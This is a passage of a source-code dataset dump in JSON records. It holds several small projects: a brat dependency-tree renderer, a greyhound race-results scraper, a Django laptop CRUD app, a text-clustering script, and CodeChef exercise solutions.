\"#000000\",\n args: [{\n role: \"parent\",\n targets: []\n },\n {\n role: \"child\",\n targets: []\n }\n ]\n })\n\n\n// from http://stackoverflow.com/a/1830844/165544\nconst isNumber = n => (!isNaN(parseFloat(n))) && isFinite(n)\n\n// Draws a brat tree from a XML words array to a div given its id\nvar draw_brat_tree = function(words, to_div, hover_fun) {\n\n let word\n const entity_types = []\n const relation_types = []\n const entities = []\n const relations = []\n const added_pos = []\n const added_rel = []\n\n const add_word = function(word, start, stop) {\n\n // console.log \"Adding word\", word, start, stop\n\n const [pos,ref,dephead,deprel] = Array.from(([\"pos\", \"ref\", \"dephead\", \"deprel\"].map((attr) => word[attr])))\n\n if (!_.contains(added_pos, pos)) {\n added_pos.push(pos)\n entity_types.push(make_entity_from_pos(pos))\n }\n\n if (!_.contains(added_rel, deprel)) {\n added_rel.push(deprel)\n relation_types.push(make_relation_from_rel(deprel))\n }\n\n const entity = [`T${ref}`, pos, [[start, stop]]]\n entities.push(entity)\n\n if (isNumber(dephead)) {\n const relation =\n [ `R${ref}`, deprel,\n [ [\"parent\", `T${dephead}` ],\n [\"child\", `T${ref}`]\n ]\n ]\n return relations.push(relation)\n }\n }\n\n const text = ((() => {\n const result = []\n for (word of Array.from(words)) {\n result.push(word.word)\n }\n return result\n })()).join(\" \")\n let ix = 0\n for (word of Array.from(words)) {\n const len = word.word.length\n add_word(word, ix, ix + len)\n ix += len + 1\n }\n\n const collData = {\n entity_types,\n relation_types\n }\n\n const docData = {\n text,\n entities,\n relations\n }\n\n return head.ready(function() {\n\n const dispatcher = Util.embed(to_div, collData, docData, webFontURLs)\n\n const div = $(`#${to_div}`)\n // Set up hover callbacks\n return dispatcher.on('doneRendering', function() {\n\n _.map(div.find(\"g.arcs\").children(), function(g) {\n const deprel = $(g).find(\"text\").data(\"arc-role\")\n return $(g).hover(() => hover_fun({ deprel }))\n })\n\n return _.map(div.find(\"g.span text\"), function(g) {\n const pos = $(g).text()\n return $(g).parent().hover(() => hover_fun({ pos }))\n })\n })\n })\n}\n\n"
},
{
"alpha_fraction": 0.5882353186607361,
"alphanum_fraction": 0.5882353186607361,
"avg_line_length": 25.846153259277344,
"blob_id": "b2097d470f0b125694ed5e94a1f26a49727b430f",
"content_id": "f756c780d7690100414c6f247a74e6c709449104",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 697,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 26,
"path": "/app/translations/check_locale_files.py",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "from __future__ import unicode_literals\nimport os, json\nfrom glob import glob\n\nfileset = (\"locale\", \"corpora\")\n\n\ndef check(setname):\n print \"checking \" + setname\n mapping = dict((fName, set(json.load(open(fName)))) for fName in glob(setname + \"*.json\"))\n \n def check_key(key, fromLang):\n for fName, json_set in mapping.items():\n if fromLang != fName:\n if key not in json_set:\n print \"The key '%s' is in file %s but not in file %s\" % (key, fromLang, fName)\n \n \n for fName, json_set in mapping.items():\n for json_key in json_set:\n check_key(json_key, fName)\n\nprint \"Ok.\"\n\nfor name in fileset:\n check(name)"
},
{
"alpha_fraction": 0.6190476417541504,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 20,
"blob_id": "1efa231d8205521fe9fd7ddc9ef6704836d55a63",
"content_id": "99ac4bb66a62829f5ac1314ea6f9f4c48634cff7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 21,
"license_type": "permissive",
"max_line_length": 20,
"num_lines": 1,
"path": "/app/lib/leaflet-settings.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "L_DISABLE_3D = true;\n"
}
] | 27 |
brunowenzel07/greyhound | https://github.com/brunowenzel07/greyhound | a2eeed6d60e97ef6829bbd073ed5ea9be55f4ae2 | 7e0d42b8bd15484557a81995cb2e03e4f9605dec | 8a42afdf937f34a7ed6da6e0660d339ff37f7b8e | refs/heads/master | 2022-03-10T03:03:29.586758 | 2019-11-18T18:15:40 | 2019-11-18T18:15:40 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8032786846160889,
"alphanum_fraction": 0.8032786846160889,
"avg_line_length": 29.5,
"blob_id": "e3a408f7042c8be805fc1a954cc4d9bc1050d230",
"content_id": "60b56bf4a141ab17d784fcd67732545de9f7ecae",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 61,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 2,
"path": "/README.md",
"repo_name": "brunowenzel07/greyhound",
"src_encoding": "UTF-8",
"text": "# greyhound\nScraper to fetch dog-race data from the internet\n"
},
{
"alpha_fraction": 0.5672979354858398,
"alphanum_fraction": 0.5823469758033752,
"avg_line_length": 24.584415435791016,
"blob_id": "e725a4d2d4901ab5279c2492c38d6abd441bef56",
"content_id": "5ea0b54d370fbab41343be944a42bb826e5eaaef",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5914,
"license_type": "permissive",
"max_line_length": 160,
"num_lines": 231,
"path": "/work/raceScraper.py",
"repo_name": "brunowenzel07/greyhound",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# ## Routine declarations \n\n# In[25]:\n\n\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\nfrom datetime import timedelta, date\nimport sys\nimport pandas as pd\nimport time\n\n\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at `url` by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None.\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n return resp.content\n else:\n return None\n\n except RequestException as e:\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200 \n and content_type is not None \n and content_type.find('html') > -1)\n\n\ndef log_error(e):\n \"\"\"\n It is always a good idea to log errors. \n This function just prints them, but you can\n make it do anything.\n \"\"\"\n print(e)\n \nadd_link = \"bulli/2033\"\nrace_date = \"11-11-1111\"\n\n\ncol = ['date','race_name','race_number','race_place', 'rug', 'dog_name', 'dog_trainer', 'time', 'mgn', 'split', 'inRun', 'wgt', 'sire', 'dam', 'sp']\nall_data = pd.DataFrame([],columns=col)\n\n\n# ## Function to scrape from the internet race_name-wise\n\n# In[26]:\n\n\ndef race_scrape():\n base_link = \"https://thegreyhoundrecorder.com.au/results/\"\n\n race_name = add_link\n link = base_link+add_link\n print(link)\n\n raw_html = simple_get(link) #Connection complete\n print(len(raw_html))\n\n html = BeautifulSoup(raw_html, 'html.parser')\n\n html_file_name='race.html'\n orig_stdout = sys.stdout\n f = open(html_file_name, 'w')\n sys.stdout = f\n\n print(html.prettify())\n\n sys.stdout = orig_stdout\n f.close()\n\n\n\n\n\n raceContent = html.findAll('div',{\"class\": \"resultsDesktopContent tabs\"})[0]\n\n raceTable = raceContent.findAll('table')\n no_of_races = int(len(raceTable)/2)\n #print(no_of_races)\n\n\n i=0 # race iterator\n while(i<no_of_races):\n\n # ##printing the unique race header\n\n raceHeader = raceTable[2*i]\n raceHeader = raceHeader.findAll('td')\n #print(len(raceHeader))\n\n raceNumber = raceHeader[0].decode_contents()\n raceSubName = raceHeader[1].decode_contents()\n raceLength = raceHeader[2].decode_contents()\n raceHeaderCategory = raceHeader[3].decode_contents()\n\n raceBets = raceHeader[4].decode_contents()\n raceBets = raceBets.replace(' ','')\n raceBets = raceBets[:(raceBets.rfind('-')+1)]+raceBets[raceBets.rfind('$'):] #output formating\n\n raceSplits = raceHeader[5].decode_contents()\n #print(raceNumber+raceSubName+raceLength+raceHeaderCategory+raceBets+raceSplits)\n\n #raceHeader is not included in the CSV at the moment\n \n raceBody = raceTable[2*i+1]\n raceBody = raceBody.find('tbody')\n rows = raceBody.findAll('tr')\n no_of_rows = len(rows)\n\n #printing the rest of the table\n\n j = 0 #row iterator\n while(j<no_of_rows):\n current_row = rows[j].findAll('td')\n\n #print(current_row)\n\n race_place = current_row[0].decode_contents()\n rug = current_row[1].decode_contents()\n dog_name = current_row[2].find('a')['href'][12:]\n dog_trainer = current_row[3].find('a')['href'][10:]\n \n if(race_place!='SCR'): \n time = current_row[4].decode_contents()\n mgn = current_row[5].decode_contents()\n split = current_row[6].decode_contents()\n inRun = current_row[7].decode_contents()\n wgt = current_row[8].decode_contents()\n sire = current_row[9].find('a')['href'][12:]\n dam = current_row[10].find('a')['href'][12:]\n sp = current_row[11].find('p').decode_contents()[2:]\n \n else: #if its SCR all these contents do not exist\n time = 'blank'\n mgn = 'blank'\n split = 'blank'\n inRun = 'blank'\n wgt = 'blank'\n sire = 'blank'\n dam = 'blank'\n sp = 'blank'\n\n #print(race_place+' '+rug+' '+dog_name+' '+dog_trainer+' '+time+' '+mgn+' '+split+' '+inRun+' '+wgt+' '+sire+' '+dam+' '+sp)\n\n df2 = pd.DataFrame([[race_date, race_name, (i+1), race_place, rug, dog_name, dog_trainer, time, mgn, split, inRun, wgt, sire, dam, sp]],columns=col)\n global all_data # to prevent local creation\n all_data = all_data.append(df2) #appending the table row\n j=j+1\n i=i+1\n \n\n\n# In[27]:\n\n\nprint(all_data) # to check if the df is created properly and has no prior content on it\n\n\n# ### fetching the date-list \n\n# In[28]:\n\n\ndateFile = pd.read_csv('date.csv') \nprint(dateFile)\n\n\n# ## All-date iterator \n\n# In[30]:\n\n\nt = time.process_time() # keeping a track of time\n\nlen_of_date = len(dateFile)\nk=0\nwhile(k<len_of_date): #iterate among all the dates in the dateFile\n print(dateFile.iloc[k,0])\n if(dateFile.iloc[k,0].find('/')==-1): #if the line is a date or a link\n race_date = dateFile.iloc[k,0] \n else:\n add_link = dateFile.iloc[k,0]\n race_scrape()\n k=k+1\n \n \nelapsed_time = time.process_time() - t\n\n\n# ### storing to CSV\n\n# In[ ]:\n\n\nall_data.to_csv('january_2016.csv',index=False)\n\n\n# In[33]:\n\n\nprint(all_data)\n\n\n# ## Total number of minutes it took \n\n# In[36]:\n\n\nprint(elapsed_time/60) # amount of time it took for all of this calculation\n\n\n# In[ ]:\n\n\n\n\n"
},
{
"alpha_fraction": 0.6115264892578125,
"alphanum_fraction": 0.6255451440811157,
"avg_line_length": 19.322784423828125,
"blob_id": "d2e55eac5ff24a8630a26b838e47261bab66b2b5",
"content_id": "5e0d41f1cf678afbd997b8eb35a7efdbe559edeb",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3210,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 158,
"path": "/work/dateScraper.py",
"repo_name": "brunowenzel07/greyhound",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[22]:\n\n\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\nfrom datetime import timedelta, date\nimport sys\n\n\n# ## All library invoke(s) \n\n# In[23]:\n\n\nbase_link = \"https://thegreyhoundrecorder.com.au/results/search/\"\n\n#html_file_name = link_date + \".html\"\n\n\n# In[24]:\n\n\nlinks=list()\n\n\n# ## URL connection functions \n\n# In[25]:\n\n\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at `url` by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None.\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n return resp.content\n else:\n return None\n\n except RequestException as e:\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200 \n and content_type is not None \n and content_type.find('html') > -1)\n\n\ndef log_error(e):\n \"\"\"\n It is always a good idea to log errors. \n This function just prints them, but you can\n make it do anything.\n \"\"\"\n print(e)\n\n\n# ## Function for each Date. The link-date is a global variable \n\n# In[26]:\n\n\ndef date_execute():\n \n link = base_link+link_date+'/' #Creation of link\n raw_html = simple_get(link) #Connection complete\n \n \n html = BeautifulSoup(raw_html, 'html.parser')\n \n \n race_date = html.find('h2').decode_contents()\n \n print(race_date) #Progress tracking output statements\n print(len(raw_html))\n print(len(html))\n \n \n \n result_div = html.findAll(\"div\", {\"class\": \"resultsTblWrap\"})\n #print(result_div)\n anchors = result_div[0].findAll('a') #selecting all the race hyperlinks\n\n i=0\n links.append(link_date)\n while (i < len(anchors)):\n #print((anchors[i]['href']))\n s=anchors[i]['href']\n links.append(s) #adding them to a global list\n i=i+1\n \n \n \n \n\n\n# ## library function to traverse through all possible dates \n\n# In[27]:\n\n\n\n\ndef daterange(start_date, end_date):\n for n in range(int ((end_date - start_date).days)):\n yield start_date + timedelta(n)\n\nstart_date = date(2016, 1, 1)\nend_date = date(2016, 2, 1) # Feb 1 2016 is the sop-date\nfor single_date in daterange(start_date, end_date):\n link_date=single_date.strftime(\"%Y-%m-%d\")\n #print(link_date)\n date_execute() #Calling day-wise function to execute\n\n\n# ## Check out the outcome \n\n# In[28]:\n\n\nprint(\"\\n\".join(links))\n\n\n# ## storing the entire list into a file\n\n# In[29]:\n\n\nwith open('datefile.txt', 'w') as filehandle:\n filehandle.writelines(\"%s\\n\" % place for place in links)\n\n\n# ### ignore | code snippet to redirect system-output to text file \nimport sys\n\norig_stdout = sys.stdout\nf = open(html_file_name, 'w')\nsys.stdout = f\n\nprint(html)\n\nsys.stdout = orig_stdout\nf.close()"
}
] | 3 |
juliamendoim/TicketClassifier | https://github.com/juliamendoim/TicketClassifier | 4a565bfc2c0b5b6d26e280ae22fed7c25227f364 | 096b9b4d33a146c7fdf45de3655714dfd345deaf | ad12e48143ff6371b52423b4fe0343ab62514498 | refs/heads/master | 2020-04-16T15:38:07.177316 | 2019-01-16T01:00:22 | 2019-01-16T01:00:22 | 165,709,645 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7046783566474915,
"alphanum_fraction": 0.707602322101593,
"avg_line_length": 16.075000762939453,
"blob_id": "6ae63ba38468561422b7b250c1bfb49f69ffcf34",
"content_id": "53f0c93aeaf0d122b9416147db7298e1dc3d9c3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 684,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 40,
"path": "/README.md",
"repo_name": "juliamendoim/TicketClassifier",
"src_encoding": "UTF-8",
"text": "# TicketClassifier\n\nAn unsupervised model for text classification of short sentences \n\n## Getting Started\n\npip install -r **requirements.txt**\n\nfor the spacy_model:\n\n- python -m spacy download de\n\nfor the nltk_stopwords, from a python console:\n\n- import nltk\n- nltk.download('stopwords')\n\n\n### Prerequisites\n\n- Python3.6\n\n\n### Running\n\n- python clustering.py *spacy_model* *nltk_stopwords* *n_clusters* *raw_input* \n\nor help:\n\n- python clustering.py -h \n\n\n## Built With\n\n* [Spacy](https://spacy.io/models/) - Spacy\n* [Sklearn](https://scikit-learn.org/stable/modules/clustering.html#clustering) - sklearn.cluster\n\n## Authors\n\n* **Julia Milanese** - [Julia Milanese](https://github.com/juliamendoim)\n\n"
},
{
"alpha_fraction": 0.7594339847564697,
"alphanum_fraction": 0.7617924809455872,
"avg_line_length": 26.65217399597168,
"blob_id": "4a30657635f74ede37529a98280725c362bb61c8",
"content_id": "9d095ab30e7242465ca9d1e77a2af379ec6fc17c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1272,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 46,
"path": "/clustering.py",
"repo_name": "juliamendoim/TicketClassifier",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport sys\nimport argparse\n\nfrom preprocessing import preprocessor\n\nfrom nltk.corpus import stopwords\nimport spacy\n\nimport pandas as pd\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nparser = argparse.ArgumentParser(description='Clustering')\nparser.add_argument('spacy_model', type=str, help='Language: de')\nparser.add_argument('nltk_stopwords', type=str, help='Stopwords: german')\nparser.add_argument('n_clusters', type=int, help='Number of clusters')\nparser.add_argument('input_file', type=str, help='input raw file with \\\\n sentence separation')\n\nargs = parser.parse_args()\n\nif not args:\n parser.print_usage()\n sys.exit(1)\n\nnlp = spacy.load(args.spacy_model)\n\nstopWords = set(stopwords.words(args.nltk_stopwords))\n\nraw_text = args.input_file\n\nwith open(raw_text, 'r', encoding='utf-8') as f:\n text = f.readlines()\n\nclean_corpus = preprocessor(text, nlp, stopWords)\n\n\ntfidfvect = TfidfVectorizer()\nagglomerative = AgglomerativeClustering(n_clusters=args.n_clusters, affinity='euclidean', linkage='ward')\n\ntfidfmatrix = tfidfvect.fit_transform(clean_corpus)\n\naggclusters = agglomerative.fit(tfidfmatrix.toarray())\n\nprint(pd.DataFrame(aggclusters.labels_, clean_corpus))\n"
},
{
"alpha_fraction": 0.6612440347671509,
"alphanum_fraction": 0.6631578803062439,
"avg_line_length": 29.735294342041016,
"blob_id": "01016128fba6d63f1ec184553731e20ee59a6b93",
"content_id": "9863730efa9e889f64e0874cb0ee2be24ffe89b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1045,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 34,
"path": "/preprocessing.py",
"repo_name": "juliamendoim/TicketClassifier",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n\ndef preprocessor(text, nlp, stopWords):\n\n corpus = [nlp(utterance) for utterance in text]\n\n lemmas = [y.lemma_ for x in corpus for y in x if y.is_stop is False and y.is_punct is False and y.lemma_.lower() not in stopWords]\n lematized_text = ' '.join(lemmas).split('\\n')\n print(lematized_text)\n\n original_tokens = [y.text for x in corpus for y in x]\n\n print('There where ' + str(len(original_tokens)) + ' tokens in original corpus')\n print('There are ' + str(len(lemmas)) + ' tokens in clean corpus')\n\n original_vocabulary = set(original_tokens)\n vocabulary = set(lemmas)\n\n print('There where ' + str(len(original_vocabulary)) + ' unique words in original corpus')\n print('There are ' + str(len(vocabulary)) + ' unique lemmas in clean corpus')\n\n # frequency dict\n\n from collections import defaultdict\n\n frequency_dict = defaultdict(int)\n\n for token in lemmas:\n frequency_dict[token] += 1\n\n print('Frecuency dictionary ', frequency_dict)\n\n return lematized_text\n"
},
{
"alpha_fraction": 0.43103447556495667,
"alphanum_fraction": 0.6551724076271057,
"avg_line_length": 13.375,
"blob_id": "74ea6704bbeb9555558c191db7043f2ff237d9ab",
"content_id": "2d0ffaeee05e8aa2c23a934c479d387998819212",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 116,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 8,
"path": "/requirements.txt",
"repo_name": "juliamendoim/TicketClassifier",
"src_encoding": "UTF-8",
"text": "jupyter==1.0.0\nnltk==3.4\nnumpy==1.15.4\npandas==0.23.4\nscikit-learn==0.20.2\nscipy==1.2.0\nsklearn==0.0\nspacy==2.0.18\n\n"
}
] | 4 |
Shubham8184/Django_Class_Based_Generic_Laptop_Model | https://github.com/Shubham8184/Django_Class_Based_Generic_Laptop_Model | 2c7910f256c01c95ccac115730ec6afd93bf622c | 641f9f8ebeea899d943dc0397de3cfc10ef818ec | 5fdf2d3e1826eb9bc4134350d526e66a87b7865f | refs/heads/main | 2023-07-27T17:06:44.236792 | 2021-09-15T04:11:28 | 2021-09-15T04:11:28 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8022388219833374,
"alphanum_fraction": 0.8022388219833374,
"avg_line_length": 32.625,
"blob_id": "3cd6cdf37ae5550645376ed77d5673341cf72976",
"content_id": "1aa9edaa5a1be2800833ce4c7aea3458c2a22e28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 268,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 8,
"path": "/Laptop_Generic/laptop/admin.py",
"repo_name": "Shubham8184/Django_Class_Based_Generic_Laptop_Model",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import LaptopModel\n\n\n\nclass LaptopModelAdmin(admin.ModelAdmin):\n list_display=['id','laptopname','laptopCompany','laptopram','laptoprom','laptopprice','laptopprocessor']\nadmin.site.register(LaptopModel,LaptopModelAdmin)"
},
{
"alpha_fraction": 0.7229551672935486,
"alphanum_fraction": 0.7387862801551819,
"avg_line_length": 26.071428298950195,
"blob_id": "5f20be6beb46bef76a1b391c518fb240778eabc9",
"content_id": "b8fea515c5498e60d4a257bbdb2b1d3050c16ba0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 379,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 14,
"path": "/Laptop_Generic/laptop/models.py",
"repo_name": "Shubham8184/Django_Class_Based_Generic_Laptop_Model",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\n\nclass LaptopModel(models.Model):\n laptopname=models.CharField(max_length=30)\n laptopCompany=models.CharField(max_length=30)\n laptopram=models.IntegerField()\n laptoprom=models.IntegerField()\n laptopprice=models.IntegerField()\n laptopprocessor=models.CharField(max_length=30)\n\n def __str__(self):\n return self.laptopname\n"
},
{
"alpha_fraction": 0.7430639266967773,
"alphanum_fraction": 0.7430639266967773,
"avg_line_length": 24.90625,
"blob_id": "697369827142f03e16bede1a00706fb2532c010f",
"content_id": "e8c82cd656b951310ecb153a2e80690b175e8911",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 829,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 32,
"path": "/Laptop_Generic/laptop/views.py",
"repo_name": "Shubham8184/Django_Class_Based_Generic_Laptop_Model",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render,redirect\nfrom .models import LaptopModel\nfrom django.views import View\nfrom django.views.generic.list import ListView\nfrom django.views.generic.edit import CreateView,UpdateView,DeleteView\n\nclass HomeView(View):\n def get(self,request):\n template_name='Home.html'\n return render(request,template_name)\n\nclass Laptoplistview(ListView):\n model=LaptopModel\n template_name='showlaptop.html'\n\nclass LaptopCreateView(CreateView):\n model=LaptopModel\n template_name='addlaptop.html'\n fields='__all__'\n success_url='/laptop/show'\n\n\nclass LaptopUpadteView(UpdateView):\n model=LaptopModel\n template_name='addlaptop.html'\n fields='__all__'\n success_url='/laptop/show'\n\n\nclass LaptopdeleteView(DeleteView):\n model=LaptopModel\n success_url='/laptop/show'\n"
},
{
"alpha_fraction": 0.7069351077079773,
"alphanum_fraction": 0.7069351077079773,
"avg_line_length": 36.33333206176758,
"blob_id": "eefdcf6f611e9270d5e8e375af4a778e6cead7e5",
"content_id": "1c21740eb726a145f656951d4bfbdd2de36e38fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 447,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 12,
"path": "/Laptop_Generic/laptop/urls.py",
"repo_name": "Shubham8184/Django_Class_Based_Generic_Laptop_Model",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom .views import HomeView, LaptopCreateView, LaptopUpadteView, LaptopdeleteView, Laptoplistview\n\n\nurlpatterns=[\n path('home/',HomeView.as_view(),name='home'),\n path('show/',Laptoplistview.as_view(),name='show'),\n path('add/',LaptopCreateView.as_view(),name='add'),\n path('update/<int:pk>',LaptopUpadteView.as_view(),name='update'),\n path('delete/<int:pk>',LaptopdeleteView.as_view(),name='delete'),\n\n]"
}
] | 4 |
anusha202024/CodeChef | https://github.com/anusha202024/CodeChef | 244200158782c3866d18baadf6e70bbb1c602d18 | 44a6c2256954b17a75971d0f248c63ff92f918f8 | 0f7ce8aecdd9e2088220c2908f2af2fa3072b2e9 | refs/heads/main | 2023-03-22T20:27:16.183351 | 2021-03-21T00:32:12 | 2021-03-21T00:32:12 | 332,655,430 | 1 | 0 | null | 2021-01-25T06:45:54 | 2021-01-26T13:54:56 | 2021-01-26T13:55:51 | Python | [
{
"alpha_fraction": 0.42677825689315796,
"alphanum_fraction": 0.47698745131492615,
"avg_line_length": 22.100000381469727,
"blob_id": "f25b9cfd76a31bfb37573dae5853b0106d7a3916",
"content_id": "7c501d3e2277660802d57022b90059ab9ac5e047",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 239,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 10,
"path": "/PEC2021B/SQALPAT.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "N = int(input())\r\nfor row in range( 1 , N+1):\r\n\tif row%2 == 0:\r\n\t\tfor i in reversed(range(row*5 - 4 , row*5 + 1)):\r\n\t\t\tprint(i , end = \" \")\r\n\t\tprint(\" \")\r\n\telse:\r\n\t\tfor i in range(row*5 - 4, row*5+1):\r\n\t\t\tprint(i , end = \" \")\r\n\t\tprint(\" \")"
},
{
"alpha_fraction": 0.5255101919174194,
"alphanum_fraction": 0.5535714030265808,
"avg_line_length": 11.066666603088379,
"blob_id": "f5e95081dc5adac0f98c83300b6f8139bfe3fc7a",
"content_id": "a5bd7d1c5deeaf230dbb3833bfb0a72716d2b9fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 394,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 30,
"path": "/INPRG01/SECLAR .py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "#You are given three distinct integers A, B, and C.\r\n#Find the 2′nd largest number among them and print it.\r\n\r\n\r\nA = int(input())\r\nB = int(input())\r\nC = int(input())\r\nif A>B and A>C:\r\n\tif B>C:\r\n\t\tprint(B)\r\n\telse :\r\n\t\tprint(C)\r\nelif B>C:\r\n\tif C>A:\r\n\t\tprint(C)\r\n\telse:\r\n\t print(A)\t\t\t\r\nelif B>A:\r\n\tprint(B)\r\nelse:\r\n print(A)\r\n\r\n\r\n#Sample Input 2:\r\n#14\r\n#28\r\n#16\r\n\r\n#Sample Output 2:\r\n#16\r\n"
},
{
"alpha_fraction": 0.6772260069847107,
"alphanum_fraction": 0.704623281955719,
"avg_line_length": 34.5,
"blob_id": "a8a7b9444b42976b630c9244139ca53c55266845",
"content_id": "360e0f7672eb189af965b37180518137b093075f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1168,
"license_type": "no_license",
"max_line_length": 173,
"num_lines": 32,
"path": "/INPRG01/ELEVSTRS.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "#Chef has been working in a restaurant which has N floors. He wants to minimize the time it takes him to go from the N-th floor to ground floor.\r\n#He can either take the elevator or the stairs.\r\n\r\n#The stairs are at an angle of 45 degrees and Chef's velocity is V1 m/s when taking the stairs down.\r\n#The elevator on the other hand moves with a velocity V2 m/s. Whenever an elevator is called,\r\n#it always starts from ground floor and goes to N-th floor where it collects Chef (collecting takes no time), it then makes its way down to the ground floor with Chef in it.\r\n\r\n#The elevator cross a total distance equal to N meters when going from N-th floor to ground floor or vice versa,\r\n#while the length of the stairs is sqrt(2) * N because the stairs is at angle 45 degrees.\r\n#Chef has enlisted your help to decide whether he should use stairs or the elevator to minimize his travel time. Can you help him out?\r\n\r\nT = int(input())\r\ni = 1\r\nwhile i<=T :\r\n\tN, V1, V2 = map(int, input().split())\r\n\tif 2*(V1**2) >= V2**2 :\r\n\t\tprint(\"Stairs\")\r\n\telse :\r\n\t\tprint(\"Elevator\")\r\n\ti = i+1\r\n\t\r\n\t\r\n#Input:\r\n#3\r\n#5 10 15\r\n#2 10 14\r\n#7 14 10\r\n\r\n#Output:\r\n#Elevator\r\n#Stairs\r\n#Stairs\r\n"
},
{
"alpha_fraction": 0.34756097197532654,
"alphanum_fraction": 0.396341472864151,
"avg_line_length": 14.600000381469727,
"blob_id": "b56be4bdbfce0b887bac1a2df2fc3cde8c937b0d",
"content_id": "2d09607f3515aba5506067d88d97b2c59fb1f25b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 10,
"path": "/PEC2021B/LINPAT.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
"text": "N = int(input())\r\ni , j , l = 1 , 0 , []\r\nwhile i <= N and i > 0:\r\n\to = 10*i\r\n\te = 2*i\r\n\tl.append(o)\r\n\tl.append(e)\r\n\ti = i + 1\r\n\tprint(l[j] , end = \" \")\r\n\tj = j + 1"
},
{
"alpha_fraction": 0.6150943636894226,
"alphanum_fraction": 0.645283043384552,
"avg_line_length": 15.5625,
"blob_id": "45e131303bfb0d6c5c5d169a9533e90dfaa6cd94",
"content_id": "0e023b6fddf8ae56ed95085b23c9aac91fc272d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 265,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 16,
"path": "/INPRG01/CLODIV.py",
"repo_name": "anusha202024/CodeChef",
"src_encoding": "UTF-8",
